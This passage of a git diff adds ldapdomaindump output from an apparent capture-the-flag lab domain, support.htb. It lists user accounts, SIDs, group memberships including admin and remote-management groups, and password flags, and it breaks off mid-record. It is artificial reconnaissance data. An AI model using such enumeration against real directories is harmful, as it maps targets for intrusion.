+<tr><td>langley.lucy</td><td>langley.lucy</td><td>langley.lucy</td><td>&nbsp;</td><td><a href="domain_users_by_group.html#cn_Domain_Users" title="CN=Domain Users,CN=Users,DC=support,DC=htb">Domain Users</a></td><td>05/28/22 11:15:10</td><td>05/28/22 11:15:11</td><td>01/01/01 00:00:00</td><td>NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD</td><td>05/28/22 11:15:10</td><td><abbr title="S-1-5-21-1677581083-3380853377-188903654-1117">1117</abbr></td><td>&nbsp;</td></tr>
+<tr><td>west.laura</td><td>west.laura</td><td>west.laura</td><td>&nbsp;</td><td><a href="domain_users_by_group.html#cn_Domain_Users" title="CN=Domain Users,CN=Users,DC=support,DC=htb">Domain Users</a></td><td>05/28/22 11:14:55</td><td>05/28/22 11:14:56</td><td>01/01/01 00:00:00</td><td>NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD</td><td>05/28/22 11:14:55</td><td><abbr title="S-1-5-21-1677581083-3380853377-188903654-1116">1116</abbr></td><td>&nbsp;</td></tr>
+<tr><td>monroe.david</td><td>monroe.david</td><td>monroe.david</td><td>&nbsp;</td><td><a href="domain_users_by_group.html#cn_Domain_Users" title="CN=Domain Users,CN=Users,DC=support,DC=htb">Domain Users</a></td><td>05/28/22 11:14:39</td><td>05/28/22 11:14:40</td><td>01/01/01 00:00:00</td><td>NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD</td><td>05/28/22 11:14:39</td><td><abbr title="S-1-5-21-1677581083-3380853377-188903654-1115">1115</abbr></td><td>&nbsp;</td></tr>
+<tr><td>cromwell.gerard</td><td>cromwell.gerard</td><td>cromwell.gerard</td><td>&nbsp;</td><td><a href="domain_users_by_group.html#cn_Domain_Users" title="CN=Domain Users,CN=Users,DC=support,DC=htb">Domain Users</a></td><td>05/28/22 11:14:24</td><td>05/28/22 11:14:24</td><td>01/01/01 00:00:00</td><td>NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD</td><td>05/28/22 11:14:24</td><td><abbr title="S-1-5-21-1677581083-3380853377-188903654-1114">1114</abbr></td><td>&nbsp;</td></tr>
+<tr><td>bardot.mary</td><td>bardot.mary</td><td>bardot.mary</td><td>&nbsp;</td><td><a href="domain_users_by_group.html#cn_Domain_Users" title="CN=Domain Users,CN=Users,DC=support,DC=htb">Domain Users</a></td><td>05/28/22 11:14:08</td><td>05/28/22 11:14:09</td><td>01/01/01 00:00:00</td><td>NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD</td><td>05/28/22 11:14:08</td><td><abbr title="S-1-5-21-1677581083-3380853377-188903654-1113">1113</abbr></td><td>&nbsp;</td></tr>
+<tr><td>raven.clifton</td><td>raven.clifton</td><td>raven.clifton</td><td>&nbsp;</td><td><a href="domain_users_by_group.html#cn_Domain_Users" title="CN=Domain Users,CN=Users,DC=support,DC=htb">Domain Users</a></td><td>05/28/22 11:13:52</td><td>05/28/22 11:13:53</td><td>01/01/01 00:00:00</td><td>NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD</td><td>05/28/22 11:13:53</td><td><abbr title="S-1-5-21-1677581083-3380853377-188903654-1112">1112</abbr></td><td>&nbsp;</td></tr>
+<tr><td>levine.leopoldo</td><td>levine.leopoldo</td><td>levine.leopoldo</td><td>&nbsp;</td><td><a href="domain_users_by_group.html#cn_Domain_Users" title="CN=Domain Users,CN=Users,DC=support,DC=htb">Domain Users</a></td><td>05/28/22 11:13:37</td><td>05/28/22 11:13:38</td><td>01/01/01 00:00:00</td><td>NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD</td><td>05/28/22 11:13:37</td><td><abbr title="S-1-5-21-1677581083-3380853377-188903654-1111">1111</abbr></td><td>&nbsp;</td></tr>
+<tr><td>thomas.raphael</td><td>thomas.raphael</td><td>thomas.raphael</td><td>&nbsp;</td><td><a href="domain_users_by_group.html#cn_Domain_Users" title="CN=Domain Users,CN=Users,DC=support,DC=htb">Domain Users</a></td><td>05/28/22 11:13:21</td><td>05/28/22 11:13:22</td><td>01/01/01 00:00:00</td><td>NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD</td><td>05/28/22 11:13:21</td><td><abbr title="S-1-5-21-1677581083-3380853377-188903654-1110">1110</abbr></td><td>&nbsp;</td></tr>
+<tr><td>anderson.damian</td><td>anderson.damian</td><td>anderson.damian</td><td>&nbsp;</td><td><a href="domain_users_by_group.html#cn_Domain_Users" title="CN=Domain Users,CN=Users,DC=support,DC=htb">Domain Users</a></td><td>05/28/22 11:13:05</td><td>05/28/22 11:13:06</td><td>01/01/01 00:00:00</td><td>NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD</td><td>05/28/22 11:13:05</td><td><abbr title="S-1-5-21-1677581083-3380853377-188903654-1109">1109</abbr></td><td>&nbsp;</td></tr>
+<tr><td>wilson.shelby</td><td>wilson.shelby</td><td>wilson.shelby</td><td>&nbsp;</td><td><a href="domain_users_by_group.html#cn_Domain_Users" title="CN=Domain Users,CN=Users,DC=support,DC=htb">Domain Users</a></td><td>05/28/22 11:12:50</td><td>05/28/22 11:12:51</td><td>01/01/01 00:00:00</td><td>NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD</td><td>05/28/22 11:12:50</td><td><abbr title="S-1-5-21-1677581083-3380853377-188903654-1108">1108</abbr></td><td>&nbsp;</td></tr>
+<tr><td>hernandez.stanley</td><td>hernandez.stanley</td><td>hernandez.stanley</td><td>&nbsp;</td><td><a href="domain_users_by_group.html#cn_Domain_Users" title="CN=Domain Users,CN=Users,DC=support,DC=htb">Domain Users</a></td><td>05/28/22 11:12:34</td><td>05/28/22 11:12:35</td><td>01/01/01 00:00:00</td><td>NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD</td><td>05/28/22 11:12:34</td><td><abbr title="S-1-5-21-1677581083-3380853377-188903654-1107">1107</abbr></td><td>&nbsp;</td></tr>
+<tr><td>smith.rosario</td><td>smith.rosario</td><td>smith.rosario</td><td>&nbsp;</td><td><a href="domain_users_by_group.html#cn_Domain_Users" title="CN=Domain Users,CN=Users,DC=support,DC=htb">Domain Users</a></td><td>05/28/22 11:12:19</td><td>05/28/22 11:12:19</td><td>01/01/01 00:00:00</td><td>NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD</td><td>05/28/22 11:12:19</td><td><abbr title="S-1-5-21-1677581083-3380853377-188903654-1106">1106</abbr></td><td>&nbsp;</td></tr>
+<tr><td>support</td><td>support</td><td>support</td><td><a href="domain_users_by_group.html#cn_Shared_Support_Accounts" title="CN=Shared Support Accounts,CN=Users,DC=support,DC=htb">Shared Support Accounts</a>, <a href="domain_users_by_group.html#cn_Remote_Management_Users" title="CN=Remote Management Users,CN=Builtin,DC=support,DC=htb">Remote Management Users</a></td><td><a href="domain_users_by_group.html#cn_Domain_Users" title="CN=Domain Users,CN=Users,DC=support,DC=htb">Domain Users</a></td><td>05/28/22 11:12:00</td><td>08/19/22 13:47:57</td><td>08/19/22 14:44:55</td><td>NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD</td><td>05/28/22 11:12:00</td><td><abbr title="S-1-5-21-1677581083-3380853377-188903654-1105">1105</abbr></td><td>&nbsp;</td></tr>
+<tr><td>ldap</td><td>ldap</td><td>ldap</td><td>&nbsp;</td><td><a href="domain_users_by_group.html#cn_Domain_Users" title="CN=Domain Users,CN=Users,DC=support,DC=htb">Domain Users</a></td><td>05/28/22 11:11:46</td><td>08/19/22 13:02:01</td><td>08/19/22 14:53:00</td><td>NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD</td><td>05/28/22 11:11:46</td><td><abbr title="S-1-5-21-1677581083-3380853377-188903654-1104">1104</abbr></td><td>&nbsp;</td></tr>
+<tr><td>krbtgt</td><td>krbtgt</td><td>krbtgt</td><td><a href="domain_users_by_group.html#cn_Denied_RODC_Password_Replication_Group" title="CN=Denied RODC Password Replication Group,CN=Users,DC=support,DC=htb">Denied RODC Password Replication Group</a></td><td><a href="domain_users_by_group.html#cn_Domain_Users" title="CN=Domain Users,CN=Users,DC=support,DC=htb">Domain Users</a></td><td>05/28/22 11:03:43</td><td>05/28/22 11:19:47</td><td>01/01/01 00:00:00</td><td>ACCOUNT_DISABLED, NORMAL_ACCOUNT</td><td>05/28/22 11:03:43</td><td><abbr title="S-1-5-21-1677581083-3380853377-188903654-502">502</abbr></td><td>Key Distribution Center Service Account</td></tr>
+<tr><td>Guest</td><td>Guest</td><td>Guest</td><td><a href="domain_users_by_group.html#cn_Guests" title="CN=Guests,CN=Builtin,DC=support,DC=htb">Guests</a></td><td><a href="domain_users_by_group.html#cn_Domain_Guests" title="CN=Domain Guests,CN=Users,DC=support,DC=htb">Domain Guests</a></td><td>05/28/22 11:01:56</td><td>08/19/22 06:15:24</td><td>01/01/01 00:00:00</td><td>PASSWD_NOTREQD, NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD</td><td>05/28/22 11:18:55</td><td><abbr title="S-1-5-21-1677581083-3380853377-188903654-501">501</abbr></td><td>Built-in account for guest access to the computer/domain</td></tr>
+<tr><td>Administrator</td><td>Administrator</td><td>Administrator</td><td><a href="domain_users_by_group.html#cn_Group_Policy_Creator_Owners" title="CN=Group Policy Creator Owners,CN=Users,DC=support,DC=htb">Group Policy Creator Owners</a>, <a href="domain_users_by_group.html#cn_Domain_Admins" title="CN=Domain Admins,CN=Users,DC=support,DC=htb">Domain Admins</a>, <a href="domain_users_by_group.html#cn_Enterprise_Admins" title="CN=Enterprise Admins,CN=Users,DC=support,DC=htb">Enterprise Admins</a>, <a href="domain_users_by_group.html#cn_Schema_Admins" title="CN=Schema Admins,CN=Users,DC=support,DC=htb">Schema Admins</a>, <a href="domain_users_by_group.html#cn_Administrators" title="CN=Administrators,CN=Builtin,DC=support,DC=htb">Administrators</a></td><td><a href="domain_users_by_group.html#cn_Domain_Users" title="CN=Domain Users,CN=Users,DC=support,DC=htb">Domain Users</a></td><td>05/28/22 11:01:56</td><td>08/19/22 04:32:27</td><td>08/19/22 04:32:50</td><td>NORMAL_ACCOUNT</td><td>07/19/22 17:55:56</td><td><abbr title="S-1-5-21-1677581083-3380853377-188903654-500">500</abbr></td><td>Built-in account for administering the computer/domain</td></tr>
+</tbody>
+</table></body></html> \ No newline at end of file
diff --git a/support/domaindump/domain_users.json b/support/domaindump/domain_users.json
new file mode 100644
index 0000000..3811a32
--- /dev/null
+++ b/support/domaindump/domain_users.json
@@ -0,0 +1,2242 @@
+[{
+ "attributes": {
+ "accountExpires": [
+ "9999-12-31 23:59:59.999999+00:00"
+ ],
+ "badPasswordTime": [
+ "1601-01-01 00:00:00+00:00"
+ ],
+ "badPwdCount": [
+ 0
+ ],
+ "c": [
+ "US"
+ ],
+ "cn": [
+ "ford.victoria"
+ ],
+ "codePage": [
+ 0
+ ],
+ "company": [
+ "support"
+ ],
+ "countryCode": [
+ 0
+ ],
+ "dSCorePropagationData": [
+ "2022-05-28 11:15:58+00:00",
+ "1601-01-01 00:00:00+00:00"
+ ],
+ "distinguishedName": [
+ "CN=ford.victoria,CN=Users,DC=support,DC=htb"
+ ],
+ "givenName": [
+ "victoria"
+ ],
+ "instanceType": [
+ 4
+ ],
+ "l": [
+ "Chapel Hill"
+ ],
+ "lastLogoff": [
+ "1601-01-01 00:00:00+00:00"
+ ],
+ "lastLogon": [
+ "1601-01-01 00:00:00+00:00"
+ ],
+ "logonCount": [
+ 0
+ ],
+ "mail": [
+ "ford.victoria@support.htb"
+ ],
+ "name": [
+ "ford.victoria"
+ ],
+ "objectCategory": [
+ "CN=Person,CN=Schema,CN=Configuration,DC=support,DC=htb"
+ ],
+ "objectClass": [
+ "top",
+ "person",
+ "organizationalPerson",
+ "user"
+ ],
+ "objectGUID": [
+ "{3040018a-60f8-4a00-8c16-bff81d4218e4}"
+ ],
+ "objectSid": [
+ "S-1-5-21-1677581083-3380853377-188903654-1120"
+ ],
+ "postalCode": [
+ "27514"
+ ],
+ "primaryGroupID": [
+ 513
+ ],
+ "pwdLastSet": [
+ "2022-05-28 11:15:58.118301+00:00"
+ ],
+ "sAMAccountName": [
+ "ford.victoria"
+ ],
+ "sAMAccountType": [
+ 805306368
+ ],
+ "sn": [
+ "ford"
+ ],
+ "st": [
+ "NC"
+ ],
+ "streetAddress": [
+ "Skipper Bowles Dr"
+ ],
+ "uSNChanged": [
+ 13063
+ ],
+ "uSNCreated": [
+ 13048
+ ],
+ "userAccountControl": [
+ 66048
+ ],
+ "whenChanged": [
+ "2022-05-28 11:15:58+00:00"
+ ],
+ "whenCreated": [
+ "2022-05-28 11:15:57+00:00"
+ ]
+ },
+ "dn": "CN=ford.victoria,CN=Users,DC=support,DC=htb"
+},{
+ "attributes": {
+ "accountExpires": [
+ "9999-12-31 23:59:59.999999+00:00"
+ ],
+ "badPasswordTime": [
+ "1601-01-01 00:00:00+00:00"
+ ],
+ "badPwdCount": [
+ 0
+ ],
+ "c": [
+ "US"
+ ],
+ "cn": [
+ "stoll.rachelle"
+ ],
+ "codePage": [
+ 0
+ ],
+ "company": [
+ "support"
+ ],
+ "countryCode": [
+ 0
+ ],
+ "dSCorePropagationData": [
+ "2022-05-28 11:15:42+00:00",
+ "1601-01-01 00:00:00+00:00"
+ ],
+ "distinguishedName": [
+ "CN=stoll.rachelle,CN=Users,DC=support,DC=htb"
+ ],
+ "givenName": [
+ "rachelle"
+ ],
+ "instanceType": [
+ 4
+ ],
+ "l": [
+ "Chapel Hill"
+ ],
+ "lastLogoff": [
+ "1601-01-01 00:00:00+00:00"
+ ],
+ "lastLogon": [
+ "1601-01-01 00:00:00+00:00"
+ ],
+ "logonCount": [
+ 0
+ ],
+ "mail": [
+ "stoll.rachelle@support.htb"
+ ],
+ "name": [
+ "stoll.rachelle"
+ ],
+ "objectCategory": [
+ "CN=Person,CN=Schema,CN=Configuration,DC=support,DC=htb"
+ ],
+ "objectClass": [
+ "top",
+ "person",
+ "organizationalPerson",
+ "user"
+ ],
+ "objectGUID": [
+ "{5961ef39-a8bc-45b6-a0f8-0b72fdb70a63}"
+ ],
+ "objectSid": [
+ "S-1-5-21-1677581083-3380853377-188903654-1119"
+ ],
+ "postalCode": [
+ "27514"
+ ],
+ "primaryGroupID": [
+ 513
+ ],
+ "pwdLastSet": [
+ "2022-05-28 11:15:42.290215+00:00"
+ ],
+ "sAMAccountName": [
+ "stoll.rachelle"
+ ],
+ "sAMAccountType": [
+ 805306368
+ ],
+ "sn": [
+ "stoll"
+ ],
+ "st": [
+ "NC"
+ ],
+ "streetAddress": [
+ "Skipper Bowles Dr"
+ ],
+ "uSNChanged": [
+ 13045
+ ],
+ "uSNCreated": [
+ 13030
+ ],
+ "userAccountControl": [
+ 66048
+ ],
+ "whenChanged": [
+ "2022-05-28 11:15:43+00:00"
+ ],
+ "whenCreated": [
+ "2022-05-28 11:15:42+00:00"
+ ]
+ },
+ "dn": "CN=stoll.rachelle,CN=Users,DC=support,DC=htb"
+},{
+ "attributes": {
+ "accountExpires": [
+ "9999-12-31 23:59:59.999999+00:00"
+ ],
+ "badPasswordTime": [
+ "1601-01-01 00:00:00+00:00"
+ ],
+ "badPwdCount": [
+ 0
+ ],
+ "c": [
+ "US"
+ ],
+ "cn": [
+ "daughtler.mabel"
+ ],
+ "codePage": [
+ 0
+ ],
+ "company": [
+ "support"
+ ],
+ "countryCode": [
+ 0
+ ],
+ "dSCorePropagationData": [
+ "2022-05-28 11:15:26+00:00",
+ "1601-01-01 00:00:00+00:00"
+ ],
+ "distinguishedName": [
+ "CN=daughtler.mabel,CN=Users,DC=support,DC=htb"
+ ],
+ "givenName": [
+ "mabel"
+ ],
+ "instanceType": [
+ 4
+ ],
+ "l": [
+ "Chapel Hill"
+ ],
+ "lastLogoff": [
+ "1601-01-01 00:00:00+00:00"
+ ],
+ "lastLogon": [
+ "1601-01-01 00:00:00+00:00"
+ ],
+ "logonCount": [
+ 0
+ ],
+ "mail": [
+ "daughtler.mabel@support.htb"
+ ],
+ "name": [
+ "daughtler.mabel"
+ ],
+ "objectCategory": [
+ "CN=Person,CN=Schema,CN=Configuration,DC=support,DC=htb"
+ ],
+ "objectClass": [
+ "top",
+ "person",
+ "organizationalPerson",
+ "user"
+ ],
+ "objectGUID": [
+ "{c8f66189-bbc6-4787-b574-f00a4fd32d80}"
+ ],
+ "objectSid": [
+ "S-1-5-21-1677581083-3380853377-188903654-1118"
+ ],
+ "postalCode": [
+ "27514"
+ ],
+ "primaryGroupID": [
+ 513
+ ],
+ "pwdLastSet": [
+ "2022-05-28 11:15:26.274557+00:00"
+ ],
+ "sAMAccountName": [
+ "daughtler.mabel"
+ ],
+ "sAMAccountType": [
+ 805306368
+ ],
+ "sn": [
+ "daughtler"
+ ],
+ "st": [
+ "NC"
+ ],
+ "streetAddress": [
+ "Skipper Bowles Dr"
+ ],
+ "uSNChanged": [
+ 13028
+ ],
+ "uSNCreated": [
+ 13013
+ ],
+ "userAccountControl": [
+ 66048
+ ],
+ "whenChanged": [
+ "2022-05-28 11:15:27+00:00"
+ ],
+ "whenCreated": [
+ "2022-05-28 11:15:26+00:00"
+ ]
+ },
+ "dn": "CN=daughtler.mabel,CN=Users,DC=support,DC=htb"
+},{
+ "attributes": {
+ "accountExpires": [
+ "9999-12-31 23:59:59.999999+00:00"
+ ],
+ "badPasswordTime": [
+ "1601-01-01 00:00:00+00:00"
+ ],
+ "badPwdCount": [
+ 0
+ ],
+ "c": [
+ "US"
+ ],
+ "cn": [
+ "langley.lucy"
+ ],
+ "codePage": [
+ 0
+ ],
+ "company": [
+ "support"
+ ],
+ "countryCode": [
+ 0
+ ],
+ "dSCorePropagationData": [
+ "2022-05-28 11:15:11+00:00",
+ "1601-01-01 00:00:00+00:00"
+ ],
+ "distinguishedName": [
+ "CN=langley.lucy,CN=Users,DC=support,DC=htb"
+ ],
+ "givenName": [
+ "lucy"
+ ],
+ "instanceType": [
+ 4
+ ],
+ "l": [
+ "Chapel Hill"
+ ],
+ "lastLogoff": [
+ "1601-01-01 00:00:00+00:00"
+ ],
+ "lastLogon": [
+ "1601-01-01 00:00:00+00:00"
+ ],
+ "logonCount": [
+ 0
+ ],
+ "mail": [
+ "langley.lucy@support.htb"
+ ],
+ "name": [
+ "langley.lucy"
+ ],
+ "objectCategory": [
+ "CN=Person,CN=Schema,CN=Configuration,DC=support,DC=htb"
+ ],
+ "objectClass": [
+ "top",
+ "person",
+ "organizationalPerson",
+ "user"
+ ],
+ "objectGUID": [
+ "{7fe7d74f-08a4-4d94-aecf-ee188456776b}"
+ ],
+ "objectSid": [
+ "S-1-5-21-1677581083-3380853377-188903654-1117"
+ ],
+ "postalCode": [
+ "27514"
+ ],
+ "primaryGroupID": [
+ 513
+ ],
+ "pwdLastSet": [
+ "2022-05-28 11:15:10.930799+00:00"
+ ],
+ "sAMAccountName": [
+ "langley.lucy"
+ ],
+ "sAMAccountType": [
+ 805306368
+ ],
+ "sn": [
+ "langley"
+ ],
+ "st": [
+ "NC"
+ ],
+ "streetAddress": [
+ "Skipper Bowles Dr"
+ ],
+ "uSNChanged": [
+ 13011
+ ],
+ "uSNCreated": [
+ 12996
+ ],
+ "userAccountControl": [
+ 66048
+ ],
+ "whenChanged": [
+ "2022-05-28 11:15:11+00:00"
+ ],
+ "whenCreated": [
+ "2022-05-28 11:15:10+00:00"
+ ]
+ },
+ "dn": "CN=langley.lucy,CN=Users,DC=support,DC=htb"
+},{
+ "attributes": {
+ "accountExpires": [
+ "9999-12-31 23:59:59.999999+00:00"
+ ],
+ "badPasswordTime": [
+ "2022-08-19 15:01:06.138906+00:00"
+ ],
+ "badPwdCount": [
+ 1309
+ ],
+ "c": [
+ "US"
+ ],
+ "cn": [
+ "west.laura"
+ ],
+ "codePage": [
+ 0
+ ],
+ "company": [
+ "support"
+ ],
+ "countryCode": [
+ 0
+ ],
+ "dSCorePropagationData": [
+ "2022-05-28 11:14:55+00:00",
+ "1601-01-01 00:00:00+00:00"
+ ],
+ "distinguishedName": [
+ "CN=west.laura,CN=Users,DC=support,DC=htb"
+ ],
+ "givenName": [
+ "laura"
+ ],
+ "instanceType": [
+ 4
+ ],
+ "l": [
+ "Chapel Hill"
+ ],
+ "lastLogoff": [
+ "1601-01-01 00:00:00+00:00"
+ ],
+ "lastLogon": [
+ "1601-01-01 00:00:00+00:00"
+ ],
+ "logonCount": [
+ 0
+ ],
+ "mail": [
+ "west.laura@support.htb"
+ ],
+ "name": [
+ "west.laura"
+ ],
+ "objectCategory": [
+ "CN=Person,CN=Schema,CN=Configuration,DC=support,DC=htb"
+ ],
+ "objectClass": [
+ "top",
+ "person",
+ "organizationalPerson",
+ "user"
+ ],
+ "objectGUID": [
+ "{790ca06e-b8aa-41da-8865-b7cc9f15f144}"
+ ],
+ "objectSid": [
+ "S-1-5-21-1677581083-3380853377-188903654-1116"
+ ],
+ "postalCode": [
+ "27514"
+ ],
+ "primaryGroupID": [
+ 513
+ ],
+ "pwdLastSet": [
+ "2022-05-28 11:14:55.446424+00:00"
+ ],
+ "sAMAccountName": [
+ "west.laura"
+ ],
+ "sAMAccountType": [
+ 805306368
+ ],
+ "sn": [
+ "west"
+ ],
+ "st": [
+ "NC"
+ ],
+ "streetAddress": [
+ "Skipper Bowles Dr"
+ ],
+ "uSNChanged": [
+ 12994
+ ],
+ "uSNCreated": [
+ 12979
+ ],
+ "userAccountControl": [
+ 66048
+ ],
+ "whenChanged": [
+ "2022-05-28 11:14:56+00:00"
+ ],
+ "whenCreated": [
+ "2022-05-28 11:14:55+00:00"
+ ]
+ },
+ "dn": "CN=west.laura,CN=Users,DC=support,DC=htb"
+},{
+ "attributes": {
+ "accountExpires": [
+ "9999-12-31 23:59:59.999999+00:00"
+ ],
+ "badPasswordTime": [
+ "1601-01-01 00:00:00+00:00"
+ ],
+ "badPwdCount": [
+ 0
+ ],
+ "c": [
+ "US"
+ ],
+ "cn": [
+ "monroe.david"
+ ],
+ "codePage": [
+ 0
+ ],
+ "company": [
+ "support"
+ ],
+ "countryCode": [
+ 0
+ ],
+ "dSCorePropagationData": [
+ "2022-05-28 11:14:39+00:00",
+ "1601-01-01 00:00:00+00:00"
+ ],
+ "distinguishedName": [
+ "CN=monroe.david,CN=Users,DC=support,DC=htb"
+ ],
+ "givenName": [
+ "david"
+ ],
+ "instanceType": [
+ 4
+ ],
+ "l": [
+ "Chapel Hill"
+ ],
+ "lastLogoff": [
+ "1601-01-01 00:00:00+00:00"
+ ],
+ "lastLogon": [
+ "1601-01-01 00:00:00+00:00"
+ ],
+ "logonCount": [
+ 0
+ ],
+ "mail": [
+ "monroe.david@support.htb"
+ ],
+ "name": [
+ "monroe.david"
+ ],
+ "objectCategory": [
+ "CN=Person,CN=Schema,CN=Configuration,DC=support,DC=htb"
+ ],
+ "objectClass": [
+ "top",
+ "person",
+ "organizationalPerson",
+ "user"
+ ],
+ "objectGUID": [
+ "{719c0404-e2c5-4220-a1c2-0a7ffeb070c0}"
+ ],
+ "objectSid": [
+ "S-1-5-21-1677581083-3380853377-188903654-1115"
+ ],
+ "postalCode": [
+ "27514"
+ ],
+ "primaryGroupID": [
+ 513
+ ],
+ "pwdLastSet": [
+ "2022-05-28 11:14:39.712057+00:00"
+ ],
+ "sAMAccountName": [
+ "monroe.david"
+ ],
+ "sAMAccountType": [
+ 805306368
+ ],
+ "sn": [
+ "monroe"
+ ],
+ "st": [
+ "NC"
+ ],
+ "streetAddress": [
+ "Skipper Bowles Dr"
+ ],
+ "uSNChanged": [
+ 12974
+ ],
+ "uSNCreated": [
+ 12959
+ ],
+ "userAccountControl": [
+ 66048
+ ],
+ "whenChanged": [
+ "2022-05-28 11:14:40+00:00"
+ ],
+ "whenCreated": [
+ "2022-05-28 11:14:39+00:00"
+ ]
+ },
+ "dn": "CN=monroe.david,CN=Users,DC=support,DC=htb"
+},{
+ "attributes": {
+ "accountExpires": [
+ "9999-12-31 23:59:59.999999+00:00"
+ ],
+ "badPasswordTime": [
+ "1601-01-01 00:00:00+00:00"
+ ],
+ "badPwdCount": [
+ 0
+ ],
+ "c": [
+ "US"
+ ],
+ "cn": [
+ "cromwell.gerard"
+ ],
+ "codePage": [
+ 0
+ ],
+ "company": [
+ "support"
+ ],
+ "countryCode": [
+ 0
+ ],
+ "dSCorePropagationData": [
+ "2022-05-28 11:14:24+00:00",
+ "1601-01-01 00:00:00+00:00"
+ ],
+ "distinguishedName": [
+ "CN=cromwell.gerard,CN=Users,DC=support,DC=htb"
+ ],
+ "givenName": [
+ "gerard"
+ ],
+ "instanceType": [
+ 4
+ ],
+ "l": [
+ "Chapel Hill"
+ ],
+ "lastLogoff": [
+ "1601-01-01 00:00:00+00:00"
+ ],
+ "lastLogon": [
+ "1601-01-01 00:00:00+00:00"
+ ],
+ "logonCount": [
+ 0
+ ],
+ "mail": [
+ "cromwell.gerard@support.htb"
+ ],
+ "name": [
+ "cromwell.gerard"
+ ],
+ "objectCategory": [
+ "CN=Person,CN=Schema,CN=Configuration,DC=support,DC=htb"
+ ],
+ "objectClass": [
+ "top",
+ "person",
+ "organizationalPerson",
+ "user"
+ ],
+ "objectGUID": [
+ "{52c897b7-cd64-4964-ac38-4a17920d4f7c}"
+ ],
+ "objectSid": [
+ "S-1-5-21-1677581083-3380853377-188903654-1114"
+ ],
+ "postalCode": [
+ "27514"
+ ],
+ "primaryGroupID": [
+ 513
+ ],
+ "pwdLastSet": [
+ "2022-05-28 11:14:24.258921+00:00"
+ ],
+ "sAMAccountName": [
+ "cromwell.gerard"
+ ],
+ "sAMAccountType": [
+ 805306368
+ ],
+ "sn": [
+ "cromwell"
+ ],
+ "st": [
+ "NC"
+ ],
+ "streetAddress": [
+ "Skipper Bowles Dr"
+ ],
+ "uSNChanged": [
+ 12957
+ ],
+ "uSNCreated": [
+ 12942
+ ],
+ "userAccountControl": [
+ 66048
+ ],
+ "whenChanged": [
+ "2022-05-28 11:14:24+00:00"
+ ],
+ "whenCreated": [
+ "2022-05-28 11:14:24+00:00"
+ ]
+ },
+ "dn": "CN=cromwell.gerard,CN=Users,DC=support,DC=htb"
+},{
+ "attributes": {
+ "accountExpires": [
+ "9999-12-31 23:59:59.999999+00:00"
+ ],
+ "badPasswordTime": [
+ "1601-01-01 00:00:00+00:00"
+ ],
+ "badPwdCount": [
+ 0
+ ],
+ "c": [
+ "US"
+ ],
+ "cn": [
+ "bardot.mary"
+ ],
+ "codePage": [
+ 0
+ ],
+ "company": [
+ "support"
+ ],
+ "countryCode": [
+ 0
+ ],
+ "dSCorePropagationData": [
+ "2022-05-28 11:14:08+00:00",
+ "1601-01-01 00:00:00+00:00"
+ ],
+ "distinguishedName": [
+ "CN=bardot.mary,CN=Users,DC=support,DC=htb"
+ ],
+ "givenName": [
+ "mary"
+ ],
+ "instanceType": [
+ 4
+ ],
+ "l": [
+ "Chapel Hill"
+ ],
+ "lastLogoff": [
+ "1601-01-01 00:00:00+00:00"
+ ],
+ "lastLogon": [
+ "1601-01-01 00:00:00+00:00"
+ ],
+ "logonCount": [
+ 0
+ ],
+ "mail": [
+ "bardot.mary@support.htb"
+ ],
+ "name": [
+ "bardot.mary"
+ ],
+ "objectCategory": [
+ "CN=Person,CN=Schema,CN=Configuration,DC=support,DC=htb"
+ ],
+ "objectClass": [
+ "top",
+ "person",
+ "organizationalPerson",
+ "user"
+ ],
+ "objectGUID": [
+ "{94869f6e-2056-48c1-b2d7-af4388ac447e}"
+ ],
+ "objectSid": [
+ "S-1-5-21-1677581083-3380853377-188903654-1113"
+ ],
+ "postalCode": [
+ "27514"
+ ],
+ "primaryGroupID": [
+ 513
+ ],
+ "pwdLastSet": [
+ "2022-05-28 11:14:08.633924+00:00"
+ ],
+ "sAMAccountName": [
+ "bardot.mary"
+ ],
+ "sAMAccountType": [
+ 805306368
+ ],
+ "sn": [
+ "bardot"
+ ],
+ "st": [
+ "NC"
+ ],
+ "streetAddress": [
+ "Skipper Bowles Dr"
+ ],
+ "uSNChanged": [
+ 12940
+ ],
+ "uSNCreated": [
+ 12925
+ ],
+ "userAccountControl": [
+ 66048
+ ],
+ "whenChanged": [
+ "2022-05-28 11:14:09+00:00"
+ ],
+ "whenCreated": [
+ "2022-05-28 11:14:08+00:00"
+ ]
+ },
+ "dn": "CN=bardot.mary,CN=Users,DC=support,DC=htb"
+},{
+ "attributes": {
+ "accountExpires": [
+ "9999-12-31 23:59:59.999999+00:00"
+ ],
+ "badPasswordTime": [
+ "2022-08-19 15:01:04.643522+00:00"
+ ],
+ "badPwdCount": [
+ 1450
+ ],
+ "c": [
+ "US"
+ ],
+ "cn": [
+ "raven.clifton"
+ ],
+ "codePage": [
+ 0
+ ],
+ "company": [
+ "support"
+ ],
+ "countryCode": [
+ 0
+ ],
+ "dSCorePropagationData": [
+ "2022-05-28 11:13:53+00:00",
+ "1601-01-01 00:00:00+00:00"
+ ],
+ "distinguishedName": [
+ "CN=raven.clifton,CN=Users,DC=support,DC=htb"
+ ],
+ "givenName": [
+ "clifton"
+ ],
+ "instanceType": [
+ 4
+ ],
+ "l": [
+ "Chapel Hill"
+ ],
+ "lastLogoff": [
+ "1601-01-01 00:00:00+00:00"
+ ],
+ "lastLogon": [
+ "1601-01-01 00:00:00+00:00"
+ ],
+ "logonCount": [
+ 0
+ ],
+ "mail": [
+ "raven.clifton@support.htb"
+ ],
+ "name": [
+ "raven.clifton"
+ ],
+ "objectCategory": [
+ "CN=Person,CN=Schema,CN=Configuration,DC=support,DC=htb"
+ ],
+ "objectClass": [
+ "top",
+ "person",
+ "organizationalPerson",
+ "user"
+ ],
+ "objectGUID": [
+ "{a3e382af-c3b7-4e7a-8564-dd42048dfbe7}"
+ ],
+ "objectSid": [
+ "S-1-5-21-1677581083-3380853377-188903654-1112"
+ ],
+ "postalCode": [
